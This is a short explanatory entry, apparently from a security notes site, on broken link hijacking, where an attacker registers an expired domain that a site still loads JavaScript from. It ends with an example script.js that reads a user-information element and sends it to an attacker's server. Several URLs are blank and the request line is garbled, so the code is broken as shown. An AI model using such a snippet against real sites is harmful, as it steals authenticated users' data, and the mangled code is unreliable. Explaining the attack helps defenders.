Broken Link Hijacking

Last modified: 2023-08-26


Broken Link Hijacking is an attack method that attacker can execute arbitrary code by hijacking link e.g. JavaScript file if target website is loading file with broken link.


Assume that target website loads external JavaScript file in no longer exists as below.

<script src="//"></script>

If attacker bought this domain, he can host arbitrary JavaScript file named script.js in the root directory.

Exploitation Examples

Attacker can write arbitrary code for compromising users in script.js as example above.
For example, if target website includes sensitive information of authenticated user in the page where the broken link is loaded, attackers can send these information to their owned server.

// script.js
var secret = document.getElementById('userinfo');
var request = new XMLHttpRequest();'GET', '' + secret, false);